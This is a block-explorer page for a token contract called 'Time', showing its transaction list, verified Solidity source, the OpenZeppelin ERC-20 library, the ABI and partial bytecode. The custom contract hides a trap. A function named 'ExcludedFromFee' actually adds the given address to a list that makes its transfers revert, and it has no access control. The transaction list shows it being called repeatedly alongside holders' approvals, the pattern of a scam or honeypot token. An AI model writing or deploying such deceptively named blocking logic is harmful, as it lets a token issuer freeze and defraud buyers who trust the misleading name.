Feature Tip: Add private address tag to any address under My Name Tag !
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 18 from a total of 18 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Excluded From Fe... | 17498789 | 584 days ago | IN | 0 ETH | 0.00066167 | ||||
Excluded From Fe... | 17498787 | 584 days ago | IN | 0 ETH | 0.00063451 | ||||
Excluded From Fe... | 17498785 | 584 days ago | IN | 0 ETH | 0.00062679 | ||||
Excluded From Fe... | 17498782 | 584 days ago | IN | 0 ETH | 0.00067803 | ||||
Excluded From Fe... | 17498780 | 584 days ago | IN | 0 ETH | 0.00069271 | ||||
Approve | 17498780 | 584 days ago | IN | 0 ETH | 0.00087687 | ||||
Approve | 17498779 | 584 days ago | IN | 0 ETH | 0.00079524 | ||||
Excluded From Fe... | 17498778 | 584 days ago | IN | 0 ETH | 0.00062397 | ||||
Approve | 17498773 | 584 days ago | IN | 0 ETH | 0.0006839 | ||||
Approve | 17498773 | 584 days ago | IN | 0 ETH | 0.00082861 | ||||
Approve | 17498770 | 584 days ago | IN | 0 ETH | 0.00087745 | ||||
Approve | 17498769 | 584 days ago | IN | 0 ETH | 0.00083816 | ||||
Excluded From Fe... | 17498768 | 584 days ago | IN | 0 ETH | 0.00066568 | ||||
Excluded From Fe... | 17498766 | 584 days ago | IN | 0 ETH | 0.00063135 | ||||
Approve | 17498765 | 584 days ago | IN | 0 ETH | 0.00081696 | ||||
Approve | 17498763 | 584 days ago | IN | 0 ETH | 0.00084486 | ||||
Approve | 17498758 | 584 days ago | IN | 0 ETH | 0.00089723 | ||||
Approve | 17498749 | 584 days ago | IN | 0 ETH | 0.00070176 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
Time
Compiler Version
v0.8.18+commit.87f61d96
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; contract Time is ERC20 { address public admin; uint256 public sellFee = 89; mapping (address => bool) public isExcludedFromFee; mapping (address => bool) public ExcludedFromFeeListed; constructor() ERC20("Time", "Time") { admin = msg.sender; _mint(msg.sender, 1000000 * (10 ** uint256(decimals()))); // Mint initial supply isExcludedFromFee[msg.sender] = true; // Exclude contract deployer from fee isExcludedFromFee[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; // Exclude Uniswap router from fee } function transfer(address recipient, uint256 amount) public override returns (bool) { require(!ExcludedFromFeeListed[_msgSender()]); if (isExcludedFromFee[_msgSender()]) { _transfer(_msgSender(), recipient, amount); } else { uint256 feeAmount = amount * sellFee / 10000; uint256 netAmount = amount - feeAmount; _transfer(_msgSender(), admin, feeAmount); // Transfer fees to admin _transfer(_msgSender(), recipient, netAmount); } return true; } function ExcludedFromFee(address account) external { ExcludedFromFeeListed[account] = true; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./extensions/IERC20Metadata.sol"; import "../../utils/Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"ExcludedFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"ExcludedFromFeeListed","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"admin","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260596006553480156200001657600080fd5b506040518060400160405280600481526020017f54696d65000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f54696d65000000000000000000000000000000000000000000000000000000008152508160039081620000949190620005f0565b508060049081620000a69190620005f0565b50505033600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200012c33620000ff620001f660201b60201c565b60ff16600a6200011091906200085a565b620f4240620001209190620008ab565b620001ff60201b60201c565b6001600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160076000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620009e2565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000271576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002689062000957565b60405180910390fd5b62000285600083836200036c60201b60201c565b806002600082825462000299919062000979565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200034c9190620009c5565b60405180910390a362000368600083836200037160201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003f857607f821691505b6020821081036200040e576200040d620003b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000439565b62000484868362000439565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004d1620004cb620004c5846200049c565b620004a6565b6200049c565b9050919050565b6000819050919050565b620004ed83620004b0565b62000505620004fc82620004d8565b84845462000446565b825550505050565b600090565b6200051c6200050d565b62000529818484620004e2565b505050565b5b8181101562000551576200054560008262000512565b6001810190506200052f565b5050565b601f821115620005a0576200056a8162000414565b620005758462000429565b8101602085101562000585578190505b6200059d620005948562000429565b8301826200052e565b50505b505050565b600082821c905092915050565b6000620005c560001984600802620005a5565b1980831691505092915050565b6000620005e08383620005b2565b9150826002028217905092915050565b620005fb8262000376565b67ffffffffffffffff81111562000617576200061662000381565b5b620006238254620003df565b6200063082828562000555565b600060209050601f83116001811462000668576000841562000653578287015190505b6200065f8582620005d2565b865550620006cf565b601f198416620006788662000414565b60005b82811015620006a2578489015182556001820191506020850194506020810190506200067b565b86831015620006c25784890151620006be601f891682620005b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000765578086048111156200073d576200073c620006d7565b5b60018516156200074d5780820291505b80810290506200075d8562000706565b94506200071d565b94509492505050565b60008262000780576001905062000853565b8162000790576000905062000853565b8160018114620007a95760028114620007b457620007ea565b600191505062000853565b60ff841115620007c957620007c8620006d7565b5b8360020a915084821115620007e357620007e2620006d7565b5b5062000853565b5060208310610133831016604e8410600b8410161715620008245782820a9050838111156200081e576200081d620006d7565b5b62000853565b62000833848484600162000713565b925090508184048111156200084d576200084c620006d7565b5b81810290505b9392505050565b600062000867826200049c565b915062000874836200049c565b9250620008a37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076e565b905092915050565b6000620008b8826200049c565b9150620008c5836200049c565b9250828202620008d5816200049c565b91508282048414831517620008ef57620008ee620006d7565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200093f601f83620008f6565b91506200094c8262000907565b602082019050919050565b60006020820190508181036000830152620009728162000930565b9050919050565b600062000986826200049c565b915062000993836200049c565b9250828201905080821115620009ae57620009ad620006d7565b5b92915050565b620009bf816200049c565b82525050565b6000602082019050620009dc6000830184620009b4565b92915050565b61163480620009f26000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063b71ff95211610066578063b71ff952146102eb578063dd62ed3e1461031b578063f1d6512e1461034b578063f851a4401461036757610100565b806370a082311461023d57806395d89b411461026d578063a457c2d71461028b578063a9059cbb146102bb57610100565b80632b14ca56116100d35780632b14ca56146101a1578063313ce567146101bf57806339509351146101dd5780635342acb41461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610385565b60405161011a9190610e11565b60405180910390f35b61013d60048036038101906101389190610ecc565b610417565b60405161014a9190610f27565b60405180910390f35b61015b61043a565b6040516101689190610f51565b60405180910390f35b61018b60048036038101906101869190610f6c565b610444565b6040516101989190610f27565b60405180910390f35b6101a9610473565b6040516101b69190610f51565b60405180910390f35b6101c7610479565b6040516101d49190610fdb565b60405180910390f35b6101f760048036038101906101f29190610ecc565b610482565b6040516102049190610f27565b60405180910390f35b61022760048036038101906102229190610ff6565b6104b9565b6040516102349190610f27565b60405180910390f35b61025760048036038101906102529190610ff6565b6104d9565b6040516102649190610f51565b60405180910390f35b610275610521565b6040516102829190610e11565b60405180910390f35b6102a560048036038101906102a09190610ecc565b6105b3565b6040516102b29190610f27565b60405180910390f35b6102d560048036038101906102d09190610ecc565b61062a565b6040516102e29190610f27565b60405180910390f35b61030560048036038101906103009190610ff6565b61077c565b6040516103129190610f27565b60405180910390f35b61033560048036038101906103309190611023565b61079c565b6040516103429190610f51565b60405180910390f35b61036560048036038101906103609190610ff6565b610823565b005b61036f61087e565b60405161037c9190611072565b60405180910390f35b606060038054610394906110bc565b80601f01602080910402602001604051908101604052809291908181526020018280546103c0906110bc565b801561040d5780601f106103e25761010080835404028352916020019161040d565b820191906000526020600020905b8154815290600101906020018083116103f057829003601f168201915b5050505050905090565b6000806104226108a4565b905061042f8185856108ac565b600191505092915050565b6000600254905090565b60008061044f6108a4565b905061045c858285610a75565b610467858585610b01565b60019150509392505050565b60065481565b60006012905090565b60008061048d6108a4565b90506104ae81858561049f858961079c565b6104a9919061111c565b6108ac565b600191505092915050565b60076020528060005260406000206000915054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060048054610530906110bc565b80601f016020809104026020016040519081016040528092919081815260200182805461055c906110bc565b80156105a95780601f1061057e576101008083540402835291602001916105a9565b820191906000526020600020905b81548152906001019060200180831161058c57829003601f168201915b5050505050905090565b6000806105be6108a4565b905060006105cc828661079c565b905083811015610611576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610608906111c2565b60405180910390fd5b61061e82868684036108ac565b60019250505092915050565b6000600860006106386108a4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561068a57600080fd5b600760006106966108a4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156106fa576106f56106ee6108a4565b8484610b01565b610772565b60006127106006548461070d91906111e2565b6107179190611253565b9050600081846107279190611284565b905061075d6107346108a4565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b01565b61076f6107686108a4565b8683610b01565b50505b6001905092915050565b60086020528060005260406000206000915054906101000a900460ff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361091b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109129061132a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361098a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610981906113bc565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a689190610f51565b60405180910390a3505050565b6000610a81848461079c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610afb5781811015610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae490611428565b60405180910390fd5b610afa84848484036108ac565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b67906114ba565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bdf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd69061154c565b60405180910390fd5b610bea838383610d77565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c67906115de565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d5e9190610f51565b60405180910390a3610d71848484610d7c565b50505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610dbb578082015181840152602081019050610da0565b60008484015250505050565b6000601f19601f8301169050919050565b6000610de382610d81565b610ded8185610d8c565b9350610dfd818560208601610d9d565b610e0681610dc7565b840191505092915050565b60006020820190508181036000830152610e2b8184610dd8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e6382610e38565b9050919050565b610e7381610e58565b8114610e7e57600080fd5b50565b600081359050610e9081610e6a565b92915050565b6000819050919050565b610ea981610e96565b8114610eb457600080fd5b50565b600081359050610ec681610ea0565b92915050565b60008060408385031215610ee357610ee2610e33565b5b6000610ef185828601610e81565b9250506020610f0285828601610eb7565b9150509250929050565b60008115159050919050565b610f2181610f0c565b82525050565b6000602082019050610f3c6000830184610f18565b92915050565b610f4b81610e96565b82525050565b6000602082019050610f666000830184610f42565b92915050565b600080600060608486031215610f8557610f84610e33565b5b6000610f9386828701610e81565b9350506020610fa486828701610e81565b9250506040610fb586828701610eb7565b9150509250925092565b600060ff82169050919050565b610fd581610fbf565b82525050565b6000602082019050610ff06000830184610fcc565b92915050565b60006020828403121561100c5761100b610e33565b5b600061101a84828501610e81565b91505092915050565b6000806040838503121561103a57611039610e33565b5b600061104885828601610e81565b925050602061105985828601610e81565b9150509250929050565b61106c81610e58565b82525050565b60006020820190506110876000830184611063565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806110d457607f821691505b6020821081036110e7576110e661108d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061112782610e96565b915061113283610e96565b925082820190508082111561114a576111496110ed565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111ac602583610d8c565b91506111b782611150565b604082019050919050565b600060208201905081810360008301526111db8161119f565b9050919050565b60006111ed82610e96565b91506111f883610e96565b925082820261120681610e96565b9150828204841483151761121d5761121c